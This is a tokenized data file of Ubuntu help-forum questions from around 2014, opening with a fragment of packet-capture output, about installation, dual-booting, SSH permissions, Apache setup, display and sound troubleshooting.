52:54:00:15:84:51 , length 28 01:10:19.886038 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 44 , length 64 01:10:19.886337 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 44 , length 64 01:10:20.885018 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 45 , length 64 01:10:20.885240 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 45 , length 64 01:10:21.884029 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 46 , length 64 01:10:21.884348 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 46 , length 64 01:10:24.473135 arp , request who-has 10.0.0.3 ( 52:54:00:17 : b3:3a ) tell 10.0.0.2 , length 28 01:10:24.473295 arp , reply 10.0.0.3 is-at 52:54:00:17 : b3:3a , length 28
456326	trusty : created desktop shortcuts not available to dash	on a clean install of trusty , desktop shortcut files created manually e.g . by manage launchers ( which worked in ubuntu precise ) are not found by the dash even though they are in /usr/share/applications . why is that ? for example , the contents of magnifier.desktop : # ! /usr/bin/env xdg-open # managelauncher_version=2.0 beta [ desktop entry ] version=1.0 type=application terminal=false name=magnifier comment=virtual magnifying glass exec=/usr/bin/vmg path=/usr/bin/ icon=/usr/share/magnifier/icon3.png categories=accessibility ; ps why is the # ! /usr/bin/env xdg-open line present when it is not present in any of the standard desktop files ( e.g . evince.desktop ) ?
456328	ssh `` permission denied ( public key ) '' automatically re-occuring problem	i have a headless server with ( until recently ) working ssh and public key auth . i deactivated passwords and had a problem resembling the one in this thread , ie . upon ssh-ing into my server i get : permission denied ( publickey ) . ratnakar pawar helpfully suggested : $ chmod go-w ~/ $ chmod 700 ~/.ssh $ chmod 600 ~/.ssh/authorized_keys which solved both priyaudupi 's issue and - for a time - mine . however now this issue seems to automatically reset on a 24-48 hour basis , i have changed the authorisation correctly twice ( plugging in my keyboard and very carefully blind typing commands . this gives me normal passwordless , public auth ssh from the single authorised computer ... then fails again within 48 hours . what might be causing this , i ca n't think of anything that would be able to automatically change permissions on my folders either ... any suggestions ? update 2nd may 2014 i have checkedcrontab -l for both the root and user , i have nothing on my user . the only cron task on root is one that updates my dns server . it does so more regularly than the problem re-occurs and does not use chmod or chown ...
456332	ubuntu admin user no unity bar and launcher	i have recently upgraded ubuntu 12.04 to 14.04 . now i am facing a problem , on login screen my pc does n't connect with wifi it says `` not enough privileges '' . also when i login , i can only see desktop wallpaper and folders . also , when i login with guest account everything works . i tried to add my account to sudo account group but it says it is already added in group i tried to reset compiz settings and unity but nothing works . i guess it is related to some permission issue
456334	need to install a multi-desktop environment on a virtual machine	i need to install a virtual machine with seperated desktops for each user and each one with it 's own customizing enabled . there should also be a separate desktop for guests with a fixed envirionment and disabled settings . although i 'm running multiple ubuntu servers , i have absolute no idea how to setup a ubuntu graphical environment . the goal is to reach a configuration like this : user0 = > desktop 0 = > admin = > accessed from everywhere ( and local ) user1 = > desktop 1 = > user = > accessed remote only from everywhere user2 = > desktop 2 = > user = > accessed remote only from everywhere user3 = > desktop 3 = > guest = > accessed remote only from restricted network ( i only need these four users at this time . ) is that possible ? and if , how can i realize this ? what are the minimum requirements ( ram , hdd , etc . ) i 've installed the new 14.04 desktop , but have even problems to get remote access enabled . i realized , that my knowledge is ok on the console , but with grapical things i 'm a absolute beginner . i really need help ! regards , michael
456335	aptana studio 3 does n't work after upgrade from ubuntu 12.04 to 14.04 ?	when i upgraded from ubuntu 12.04 to 14.04 aptana studio 3 does n't work any more . when i try to open it after a few minutes it just closes , but when i open it in the terminal i got this error massage . a fatal error has been detected by the java runtime environment : sigsegv ( 0xb ) at pc=0xa144786d , pid=3011 , tid=3076155136 jre version : openjdk runtime environment ( 7.0_51-b31 ) ( build 1.7.0_51-b31 ) java vm : openjdk client vm ( 24.51-b03 mixed mode , sharing linux-x86 ) problematic frame : c [ libsoup-2.4.so.1+0x5486d ] soup_session_feature_detach+0x1d failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again an error report file with more information is saved as : /opt/aptana_studio_3/hs_err_pid3011.log if you would like to submit a bug report , please include instructions on how to reproduce the bug and visit : http : //icedtea.classpath.org/bugzilla the crash happened outside the java virtual machine in native code . see problematic frame for where to report the bug . i tried to reinstall that frame using synaptic , but it does n't work . after that , i uninstall aptana studio . i installed it by this manual . i have used this manual before upgrade and after upgrade .
456336	shift+delete not working right in xubuntu 14.04	if i use it on a file i 'm not asked if i want to permanently delete it . once or twice it 's happened though . how do i get the original behaviour back ?
456338	for unknown reasons to me , plex stopped and will not run again.connection at localhost:32400 ?	long time lurker , first time poster . yesterday at around 2pm plex just stopped streaming . closed out of program and restarted pc . plex will no longer run . searched several forums and nothing listed has worked . removed plex and re-installed several times . pc is running linux ubuntu 12.04 lts . when i open plex , i receive error in firefox . `` firefox ca n't establish a connection to the server at localhost:32400 '' any ideas ? thanks is advance .
456341	gdm is not showing all my available shells after upgrade to 14.04	i upgraded ubuntu to 14.04 . i have around 15 or so shells installed ( unity , gnome , mate , lubuntu , cinnamon , chromium os , and a bunch of other random ones ) on 13.10 , i could see all of them with a drop-down menu in gdm . however , on 14.04 , only the first 10 or so are available , because the menu was changed from an arrow to a `` settings '' gear , and is lower , so the last few are cut off . can i fix this without reverting to 13.10 ?
456343	why torsocks do n't use tor socks via wget ?	i want to run wget command with using of tor socks but my problem is i think the torsocks do n't use tor and download even if tor is not running . i stop the tor via vidalia control panel and then i run torsocks wget whatismyipaddress.com and it start to download the website.i saw this : http : //whatismyipaddress.com/blacklist-check reusing existing connection to whatismyipaddress.com:80 . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `whatismyipaddress.com/blacklist-check' how can i force the torsocks to use tor or if it uses it how can i be sure it is using it ?
456345	what is the difference between multiverse and partner sources	if i understand https : //help.ubuntu.com/community/repositories/ubuntu correctly , both are not free and not supported by canonical . so what is the difference between them ? where can i get a list of the partners and their repositories ? is there an official ( non wiki ) documentation from canonical on this subject ? specifically : can multiverse software be closed source ? if not , how and why can non free software be open source ? what are `` licensing requirements '' ? an example would be great . closed source does not imply proprietary ? how is proprietary different from non free ? partner software gets support from whom ? enterprises which have contracts with canonical stating they will provide support ? is this what partners are ?
456350	i ca n't make any form of editions in my etc folder	every time i try to make an edition one that is required i keep getting access denied . i wanted to edit a text file i used notepad , access denied me from saving it . i used limbra , access denied me from saving it . i used terminal to try copying the file into the apache folder in etc , access denied it from copying . i used vim to edit the file through terminal , access denies me again from saving the file . i do n't understand . am i not supposed to have this access ? what do i do now ?
456351	which drivers can i use for external usb 7.1 soundcard ?	after googling for a while for drivers for my sweex sc016 sound card , i could n't find any suitable driver , or how to use this sound card in ubuntu . maybe you guys can help me ? i 'm using lubuntu 14.04 x64 , the usb sound card is the sweex sc016 7.1 sound card . thanks in advance !
456352	can not boot off of usb flash drive to install ubuntu	unetbootin tells me to reboot after it 's done placing the contents on my flash drive . after i restart my pc , i press the del key to enter the bios . i then go to the boot menu and change the 1st boot priority to the removable media ( sometimes it shows up as usb:2.0 ) . after that , i press f10 to save the changes and it restarts my pc . i see the american megatrends boot screen and then my hardware monitor , but i never see a purple screen come up , instead i get the windows boot screen with the starting windows caption . what have i missed ?
456354	how can i replace my windows partition with another ubuntu based distro , in a dual boot system ?	if i wanted to replace my windows partition ( in a dual boot system , windows xp/lubuntu ) with another ubuntu-based distro , how would i do it ? would i just overwrite the windows partition using the third option of the ubuntu installer ? if so , do i have to do something else ( like creating additional partitions ) , or just point the installer in the direction of the partition to be replaced ( overwrite ) ? my partition table is this : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x43c4e8b6 device boot start end blocks id system /dev/sda1 * 63 160682129 80341033+ 7 hpfs/ntfs/exfat /dev/sda2 292045635 312560639 10257502+ 7 hpfs/ntfs/exfat /dev/sda3 160684030 292044799 65680385 5 extended /dev/sda5 160684032 289968127 64642048 83 linux /dev/sda6 289970176 292044799 1037312 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdc : 8000 mb , 8000110592 bytes 160 heads , 19 sectors/track , 5139 cylinders , total 15625216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 32 15625215 7812592 b w95 fat32 johnny @ johnny-fq652aa-aba-cq2009f-na910 : ~ $
456355	have tearing ( no vsync ) in movies ( nvidia proprietary driver )	this is more of kde than ubuntu question , but ... i have visible tearing on screen . kde composition , flash video in firefox , and simple games like kpat are vsynced , but in steam games and in movies there is a distinct constant tearing . if i turn off vsync everywhere , the tearing is double as noticeable , so it is not just gpu ignoring the settings . what bugs me most it that i 'm having the same problem on many different setups . does everybody have this problem and nobody cares ? my setup kubuntu ( last few versions ) or opensuse or gentoo . kde 4.12 - 4.13 nvidia gtx 260 , 570 , titan , different driver versions . i watch movies in smplayer with mplayer2 backend . vlc has the same problem . what did i try ( and it did n't help ) switching on and off in different configurations the vsync settings in nvidia-settings and kde desktop effects . switching mplayer output and direct rendering settings . turning off adaptive power mode in nvidia-settings . turning off compositing changing monitor hz running mplayer from cli performing rituals and sacrifices what did work ( but is not and acceptable solution ) disabling kde , and running mplayer in pure x session switching to nouveau and turning off composition and opening video in fullscreen - without any part it is still tearing . please advice . update 1 i found out that if i go to desktop effects -- advanced and change there anything valuable ( opengl version , scaling algorythm ) and push apply , the tearing is gone until reboot . however , no setting solves this once and for all . after reboot i have to go and change something again.i guess it is enough to blame this on a bug , not my mistakes , so i will file out bug report .
456359	unbind alt-click ( gnome classic )	ubuntu 12.04 , gnome classic . trying to unbind/change < altclick-1 > that moves windows ( reason being another app is using that and anyway i want to change it ) . but could n't find it in how to unbind shift-alt up shortkey in 12.04 ? ( compiz ) how do i unbind ctrl-alt-t ? ( config mgr ) compiz has `` move window '' disabled , and i do n't find anything relevant in config-manager to remove that key binding . any idea ?
456369	copy and paste with photobucket	in photobucket , when i open the `` get links '' tab , then click on the desired link , i get the message `` copied '' . i can then paste that link within that page , but after leaving that page , the copy and paste functions are not highlighted . copy and paste seems to work everywhere else . any ideas ?
456371	how to dual boot ubuntu 14.04 lts and windows 8 ?	i have a hp pavillion sleekbook touchsmart pc with 4gb ram and 500gb hard disk . i want to dual boot windows 8 ( which came preloaded ) with ubuntu 14.04 lts . there are 4 partitions of the hard drive as follows : - c : windows os ( 104 gb free of 219 gb ) d : recovery drive ( 2.80 gb free of 26.1gb ) e : software and files ( 36.3gb free of 109gb ) f : videos ( 43.7gb free of 109gb ) i was reading articles on the internet involving multiple paritions and it is giving me a headache . i want to know how to create appropriate partitions to run ubuntu . do i need to format my hard disk and combine it into a single one and then load ubuntu. ? ? ? i want ubuntu for the development tools . i am gon na be doing my coding there and also for watching some movies occasionally . windows will be used for gaming and videos . so ideally out of the 500gb i would like to allocate windows - 300gb and ubuntu - 200gb . for any other media i can use an external hard disk . how do i dual boot properly ? windows 8 has secureboot and uefi also so i am not gon na try this dual boot unless i am absolutely sure . i do not want to lose windows 8 also . please help ! !
456373	unable to add tlp	i am new to ubuntu . i was trying to install tlp for better power management . but , somehow it 's not getting added . please help ! please check this link to terminal screen-shot : my terminal window note : i am college student and i am using internet through college lan . thanks in advance : )
456376	why shell and browser return diffrent ip address ?	i set global webproxy by ubuntu setting- > network- > networkproxy and then i open http : //whatismyipaddress.com/ and i get my proxy ip address but when i use this command : wget -qo- http : //ipecho.net/plain i get my real ip address , does not shell use global proxy setting ?
456379	where can i find ubuntu one client for mac ?	i have a lot of stuff on ubuntu one and i want to download it before the services close down . unfortunately i can not find the ubuntu one client for mac . there is nothing on the official site as ubuntu one for mac did they remove it when they announced the shut down of ubuntu one ? where can i get it downloaded ?
456380	uninstall a manually installed program	i have installed a program ( taskwarrior.org ) manually -- - cmake , make , make install , etc . how do i completely uninstall a program installed this way ? there was no 'uninstall ' script in the downloaded zip file .
456382	how to run zsh and tmux with xterm-256color by default	i am using ubuntu gnome 14.04 and i want to have tmux and zsh opened when i start a new terminal . for now , in my preference of the terminal , i run tmux by default . in the ~/.tmux.conf file i have this : set-option -g default-shell /bin/zsh it works but i have a problem with colors so i need to use term=xterm-256color tmux to run tmux . i tried to replace the command launched by default but it produce this error : no such file of this type . i tried to run zsh by default and i added this in my ~/.zshrc : if [ `` $ tmux '' = `` '' ] ; then term=xterm-256color tmux ; fi it works but it launch zsh then it launch another process with zsh again . it 's not very clean and when i try to close the terminal , it say than i have an active process running . what can i do to make it work ?
456384	xen pci passthru works with 2gb ram but not with 4gb ram	i set up xen on ubuntu 14.04 ( xen 4.4 ) . with my config i can only use pci passthru when giving domu 2048mb ram . when giving 4096mb the gpu does n't work ( windows says code 12 ) . here is my win7.cfg : device_model_version = `` qemu-xen '' name = `` win7 '' builder = `` hvm '' vif = [ 'type=ioemu , mac=00:16:3e:68:07:07 , bridge=xenbr0 ' ] # ram size in mb memory = `` 2048 '' # 2048mb will work with passthru , 4096mb won't vcpus = 4 disk = [ 'file : /win7.img , hda , w ' ] # windows7 installed boot= '' c '' acpi=1 # hd7870 , usb pci= [ '01:00.0 ' , '00:1a.0 ' ] i start the vm using : sudo xl cr /etc/xen/win7.cfg does n't get errors does anybody have an idea ? greets
456390	how do i install the game eggnog ( without using wine ) ?	here is where the game 's files can be found : http : //madgarden.net/junkz/files/eggnogg . i tried following the instructions here : how do i install a .tar.gz ( or .tar.bz2 ) file ? to install eggnog , but i could find an install file . how do i install it ?
456392	eclipse not launching	i have installed ubuntu 14.04 , i have installed eclipse using ubuntu software center . but eclipse is not opening , when i click it is not opening or showing any error message it is very silent . output for java -version : java version `` 1.7.0_55 '' java ( tm ) se runtime environment ( build 1.7.0_55-b13 ) java hotspot ( tm ) server vm ( build 24.55-b03 , mixed mode ) uname -a : linux lenovo-ideapad-z510 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux when i give eclipse in terminal i am getting the program 'eclipse ' is currently not installed . you can install it by typing : sudo apt-get install eclipse-platform and when i give sudo apt-get install eclipse-platform reading package lists ... done building dependency tree reading state information ... done eclipse-platform is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded .
456397	unity launcher/gnome panel overlap issue on gnome desktop	i use gnome desktop and have the unity launcher running as well . i was able to achieve this by installing gnome and doing this . after i did it , the gnome panel at the top and the unity launcher on the left were overlapping in the top left corner . i switched between gnome , gnome classic , and gnome classic ( no effects ) at login screen several times ( and installed some other packages including ccsm ) and eventually they started playing nice together and the top of the unity launcher starts under the gnome panel . after that , i stopped messing with it altogether for fear of them overlapping again . i 'm not sure what actually caused them to behave how i want . now this hard drive is failing and i 've got a replacement being shipped . i want to recreate the setup i have now without all the guessing . is there a simple set of steps to achieve the desired result ( unity launcher bar at left and gnome panel bar at top do not overlap in top left corner ) ?
456399	listing drives that do n't exist	ubuntu 12.04 . i have a flashdrive and an external drive on my system . lately ubuntu has created ghost drives with the same name . when i try to save a file , it writes the file to the ghost drive and not the real drive . if i remove the drives the ghost is still there . what is going on ? what can i do about it ? this problem seems to have solved itself .
456400	why ca n't i access a shared folder from within my virtualbox machine ?	i have ubuntu 14.04 as my host system , and then on virtualbox , i have lubuntu 14.04 . i am trying to share a folder on my host system so that my guest system can write files to it . i 've followed instructions as best i can , installed the virtualbox guest additions . i 've got to the point where i 've added the shared folder in the devices interface : however , even after rebooting , i ca n't find the folder anywhere in my guest system . how do i get my shared folder to actually show up in my guest lubuntu machine ?
456401	vps/cloud configuration management automatization for small environments	what would be an appropriate tool/approach for configuration management of a relatively small number of vps/vms ( 1-5 ) . even though it 's a small number i 'm a big fan of 'nuke 'n boot ' and therefore need to be able to setup a new vps with an existing configuration quickly . puppet , chef and the likes seem to be fairly oversized for that setup - apart from the fact that they aim to sell their enterprise version and the open source version is rather crippled . open source is a criteria for me . i currently manage most of this stuff manually by having copies of the relevant config files on dropbox or summaries inevernote . preferably i would use a tool that runs on a local ubuntu server from which i could easily manage one to a few remote vps or local vm instances . does anyone have experience with that topic and can recommend something ? i consider chef and puppet oversized , etckeeper on the other hand is a bit too limited . thanks .
456405	how to run application for a set time in shell	if and how is it possible to , in terminal , to get an application to run for 30 seconds , before being force closed , and echoing the logs of that process ?
456413	dell latitude e5500 bios error : no boot sector detected on usb during the ubuntu installation	i am trying to install the ubuntu in external hdd ( transcend store jet usb 3.0 1 tb ) using the laptop latitude e5500 ( of course old model ) . laptop is able to detect the boot device from pen drive ( 16 gb transcend usb 2.0 ) . when i install the ubuntu in the external hdd , bios is giving error message as 'no boot sector on usb ' ( if i remember the exact sentence ) . i have tried the below ways . i have 2 pen drives ( 16 gb usb 2.0 ) , one laptop ( e5500 ) , one external hdd ( 1 tb usb 3.0 ) . option 1 : step 1 : - created the boot-able linux on pen drive using the 'universal-usb-installer-1.9.5.2.exe ' . step 2 : - restarted the pc and ubuntu is running successfully with linux in pen drive . step 3 : - install linux in external hdd ( order of partition ( '/boot ' : 500 mb ; '/ ' : 120 gb ; swap : 10 gb ) ) . installation success . step 4 : - restart pc , removed the pen drive and select boot from usb mass storage . error 'no boot sector on usb ' -- -- -- no success . option 2 : step 1 : - created the boot-able linux on pen drive 1 using the 'universal-usb-installer-1.9.5.2.exe ' . restarted the pc and ubuntu is running successfully with linux in pen drive 1 . step 2 : - boot partition in pen drive 2 ( '/boot ' : - 500 mb ; remaining space of 16 gb as ntfs partition . ) and partitions ( '\ ' : 120 gb ; 'swap area ' : 10 gb ) in external hdd . installation success step 3 : - restart pc , removed the pen drive 1 and select boot from usb mass storage . again error 'boot sector ( bootmgr ) not found . press alt+ctrl+delete to restart ' -- -- -- no success . i think this error is from device pen drive 2 . is bios has problem of detecting the usb 3.0 hdd or it is not able to detect the large size hdd ; i am not sure . my bios version is a19 . is there any way i can install linux on laptop ( latitude e5500 ) . laptop is running well with windows 7 . note : please no suggestions on change of laptop . as this my organisation laptop , in which i do not have any control . i hope all of you have understood my question . thanks in advance .
456415	problems with running ubuntu os	i have installed ubuntu 14.04 on my notebook . i chose alongside with windows 7 mode . the installation was successful . after restarting and rejecting the ubuntu disk computer started to load windows without asking me make a choice between ubuntu and windows ? what 's a problem guys ? moreover i checked ubuntu disk again it showed me that ubuntu has already been installed and ready to use .
456417	dual monitors will only display in mirrored mode ; how do i configure the second one as an extended desktop ?	recently i installed 14.04 on : asus a88xm-a mobo amd a10 7700k cpu 32g ram . the kernel version is : - 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux my video connections are through the integrated video connections of the mobo ( not a separate video card ) . my hdmi monitory is a samsung 27 syncmaster . yesterday i purchased a benq sensey 27 now connected to the dvi-d with single link cable . the problem is both monitors are mirrored . displays shows only one monitor pink colored ( built-in display ) and below that built-in display is pink , the on/off switch is greyed and set to on . mirror displays is greyed as well appearing to be unchecked . resolution is 1920x1080 ( 16:9 ) launcher placement is all displays . nothing happens when i click the detect displays . please help me understand how to turn off mirroring in a dual monitor configuration . do not really know what i am looking fro her , but in /var/log/xorg.0.log this looks interesting : [ 22.952 ] ( ii ) loading sub module `` fbdevhw '' [ 22.952 ] ( ii ) loadmodule : `` fbdevhw '' [ 22.952 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 22.952 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 22.952 ] compiled for 1.15.1 , module version = 0.0.2 [ 22.952 ] abi class : x.org video driver , version 15.0 [ 22.952 ] ( ee ) open /dev/fb0 : no such file or directory [ 22.952 ] ( ee ) open /dev/fb0 : no such file or directory [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` radeon '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` radeon '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` radeon '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` radeon '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` modesetting '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` modesetting '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` fbdev '' [ 22.952 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 22.952 ] ( ee ) screen 0 deleted because of no matching config section . [ 22.952 ] ( ii ) unloadmodule : `` fbdev '' [ 22.952 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 22.952 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 22.952 ] ( ii ) loading sub module `` vbe '' also , only one of my monitors is listed in this log : [ 22.994 ] ( ii ) vesa ( 0 ) : monitor name : s27b550 [ 22.994 ] ( ii ) vesa ( 0 ) : number of edid sections to follow : 1 [ 22.994 ] ( ii ) vesa ( 0 ) : edid ( in hex ) : [ 22.994 ] ( ii ) vesa ( 0 ) : 00ffffffffffff004c2d1b093034355a [ 22.994 ] ( ii ) vesa ( 0 ) : 22160103803c22782af711a3564f9e28 [ 22.994 ] ( ii ) vesa ( 0 ) : 0f5054bfef80714f81c0810081809500 [ 22.994 ] ( ii ) vesa ( 0 ) : a9c0b3000101023a801871382d40582c [ 22.994 ] ( ii ) vesa ( 0 ) : 450056502100001e011d007251d01e20 [ 22.994 ] ( ii ) vesa ( 0 ) : 6e28550056502100001e000000fd0018 [ 22.994 ] ( ii ) vesa ( 0 ) : 4b1e5111000a202020202020000000fc [ 22.994 ] ( ii ) vesa ( 0 ) : 00533237423535300a2020202020014d [ 22.994 ] ( ii ) vesa ( 0 ) : edid vendor `` sam '' , prod id 2331 [ 22.994 ] ( ii ) vesa ( 0 ) : using edid range info for horizontal sync [ 22.994 ] ( ii ) vesa ( 0 ) : using edid range info for vertical refresh [ 22.994 ] ( ii ) vesa ( 0 ) : printing ddc gathered modelines : [ 22.994 ] ( ii ) vesa ( 0 ) : modeline `` 1920x1080 '' x0.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync ( 67.5 khz ep ) [ 22.994 ] ( ii ) vesa ( 0 ) : modeline `` 1280x720 '' x0.0 74.25 1280 1390 1430 1650 720 725 730 750 +hsync +vsync ( 45.0 khz e ) [ 22.994 ] ( ii ) vesa ( 0 ) : modeline `` 800x600 '' x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e )
456419	trying to install 14.04 - installations stops:	the installation seems fine up to the point where it reaches `` configuring bcmwl-kernel '' ( process 23366 ) , then it freezes . i have tried twice on the same laptop ( hp dv8000 ) with the same result . installing from image on dvd .
456420	can not run ubuntu 12.04.4 live or install ubuntu	i have had exposure to linux in the past ( principally mandrake and knoppix ) , and have experimented with various live linux distributions . my mother 's laptop runs windows xp , and has recently been riddled with malware . i have successfully run live distributions of knoppix 7.2.00 & ubuntu 12.04 on it earlier this year . however following the malware ( most of which has been removed ) i can not run ubuntu 12.04.41 live ( or any other live distributions ) or install ubuntu 12.04.41 on the c drive ( there is 50 gb free ) . when ubuntu boots from the dvd , the program gets as far as asking whether to install/run from dvd , then goes to a purple screen with ubuntu 12.04 , with several flashing dots below it . after a while a series of error messages appear commencing with an error message b43/vcodes.fw , with a link to the relevant website . i have downloaded/run the drivers mentioned , but nothing changes . i have tried loading ubuntu 12.04 on a flash drive using pendrive linux , but despite the bios settings being set to boot from usb then dvd then c drive , the results are identical to the dvd . i really do n't know how to proceed . i can not erase xp & picasa until ubuntu ( or another distribution ) works and there seems to be no point in replacing the built-in ( scsi ) drive until it does . i have run out of ideas . all suggestions will be gratefully received .
456425	alc892 low sound issue fixed with changing alsa config , why does it work ?	i updated to 14.04 . my sound immediately transitioned from being normal to sounding extremely quiet , sounding like it was at 5 % of max volume , though all my volumes were set properly . i tried lots of things to fix it by adjusting volumes , reloading alsa , etc . i then ran 'aplay -l ' which output that i had an alc892 sound card . i google 'd issues with 14.04 and alc892 and found a solution which said to modify /etc/modprobe.d/alsa-base.conf and add to the end of the file : snd-hda-intel model=generic it worked and fixed it ! now when i run 'aplay -l ' it just reports my sound card as hda intel pch . my question is , why did this fix my sound ?
456430	compiling intel-phc says i do n't have headers	trying to follow an online tutorial `` intel-phc with latest kernel on ubuntu '' . my ubuntu kernel version is 3.2.0-38-generic ( ubuntu 14.04 ) . following the instructions i downloaded kernel 3.14.2 from https : //www.kernel.org . i was able to do all the steps except for the last two ones ( make , sudo make dkms_install ) . i get : makefile:29 : *** kernel version not found , maybe you need to install appropriate kernel-headers or run make with kernelsrc parameter , e.g . : make kernelsrc=/usr/src/linux . stop . what am i missing here ? if i understand the makefile right , it expects the compiled kernel to have the same version as my current kernel ? however this is not what i read in the tutorial .
456432	audio abruptly stopped recording	at first it was working just fine . i went to record a game on steam and checked the video afterwards . no sound was recorded . the games i 've recorded before on steam worked just fine . simplescreenrecorder is what i was using . i 've tested it with recordmydesktop and the problem persists . i 'm using 12.04 by the way .
456433	windows 8.1 boot failure	i have a pc with a dual boot of windows 8.1 and linux mint . mistakenly i was playing with easybcd . after that my pc is not booting . it has showed me a message about windows startup failure . luckily i have a ubuntu 14.04 bootable usb . so i installed this ubuntu replaced in the linux mint partition . now although i am able to boot ubuntu , when i select to boot windows 8.1 it shows the same old error message . i can access the files through ubuntu . i do n't have any other pc . please help me to recover my windows 8.1 . thank you .
456437	is there a way to append nohup output file ?	i run my script with this command nohup python a.py > /var/log/a.log 2 > & 1 & this is okay but every time i run this command /var/log/a.log file is truncated . is there a way to append this file no matter what ?
456439	tried all ideas to install utorrent	i have tried all the options i can find on multiple forums to get utorrent . i need an idiot proof step by step instruction . i have used multiple terminal commands to no avail . wget http : //download.utorrent.com/linux/utorrent-server-3.0-25053.tar.gz this is the output i get -- 2014-04-27 10:05:39 -- http : //download.utorrent.com/linux/utorrent-server-3.0-25053.tar.gz resolving download.utorrent.com ( download.utorrent.com ) ... 67.215.233.132 connecting to download.utorrent.com ( download.utorrent.com ) |67.215.233.132|:80 ... connected . http request sent , awaiting response ... 404 not found 2014-04-27 10:05:39 error 404 : not found . thanks in advance for all the help .
456440	partitioning the hard drive with only one device	i currently run ubuntu and i like it a lot , but i am unable to play any good games without using the wine/playonlinux or in a virtual machine . i am trying to dual boot windows 7 and ubuntu , but i have only one 2tb hard drive . when i try to partition the drive , i get an error saying the drive is busy ( which makes sense because i 'm using it ) . i tried to download the image of windows and ubuntu in separate usb drives and tried to boot from the bios , but it did n't work . i think the easiest way would be to completely erase the entire hard drive and partition it into 2 1tb drives . from there i could reinstall ubuntu and windows separately . any suggestions on how to do this without using a cd ? this is the output of lsblk command : lsblk name maj : min rm size ro type mountpoint sda 8:0 0 1.8t 0 disk ├─sda1 8:1 0 487m 0 part /boot/efi ├─sda2 8:2 0 1.8t 0 part / └─sda3 8:3 0 15.9g 0 part [ swap ] sr0 11:0 1 1024m 0 rom
456441	setting up apache2 webserver -- differences between behaviour within my intranet and outside	i am new to apache2 . i have an ubuntu 12.04.4 lts machine in my home , and just installed apache2 on it . i wanted to set up a webserver running on a port other than port 80 ( my router uses port 80 ) . here 's what i did : changed some lines at the beginning of /etc/apache2/ports.conf from namevirtualhost *:80 listen 80 to namevirtualhost *:8041 listen 8041 changed the first line of /etc/apache2/sites-available/default from < virtualhost *:80 > to < virtualhost *:8041 > restarted apache2 my ubuntu machine has local ip address 192.168.1.133 , and from any computer on my home intranet if i point a web browser to http : //192.168.1.133:8041 then i get the standard apache2 `` it works ! '' web page . i also set up my router to port forward any incoming tcp packets on port 8041 to the ubuntu machine ( still on port 8041 ) . let 's say my isp has given me the ip address 123.456.78.90 . if i am outside my intranet and i point a web browser to http : //123.456.78.90:8041 then again it works . however , within my intranet ( on the ubuntu machine itself or on other machines on the intranet ) , when i point a web browser to http : //123.456.78.90:8041 i get an `` unable to connect '' error . where do i go from here ? i am now unclear about whether this is an issue with my apache set-up or my router . i have now unfortunately realised though that it is probably not a question about ubuntu : -/
456443	systematic freezes with unity on 14.04	i recently installed ubuntu 14.04 on my secondary ssd ( primary has win 8.1 on it ) . first of all ( it might not be completely relevant with my freezing issue but i think it 's worth mentioning ) : my bios does n't look too happy with this . in my quick boot screen , there 's no list of drives anymore . the list of drives is replaced with the same message for every entry : `` please select the booting drive '' which wo n't do anything ; so , i have to enter the bios every time in order to boot ubuntu and switch the hard drives boot priority . doing so , my bios would sometimes reboot for no reason . really weird . anyway , when i boot into ubuntu , i 'm always greeted with a few `` system program problem detected '' messages that are open in the top left corner and that i have to click `` cancel '' to dismiss ( up to 10 times in a row , as error windows pile up ) and can only report ( no more details available ) . after dismissing the messages , the os will just totally freeze after a while . completely . i 've got no other solutions than reset the computer . so all in all , i ca n't really use it and i 'm back in win 8.1 . there 's really no action that triggers the bug , it would happen during all kind of tasks . however , i 'm fairly sure it 's unity related as i do n't have any freeze with xfce or gnome3 . the system is up-to-date . here 's my hardware , fyi : core i7 12gb of ram nvidia geforce 660 ( with nouveau drivers activated but i 've had the bug with the nvidia drivers ) ubuntu is installed on a m4 crucial ssd windows is installed on a m500 crucial ssd medias are stored on ntfs standard harddrives ( that may or may not be accessed during a freeze ) . soundcard : delta audiophile 24/96 . two monitors connected any idea ? thanks !
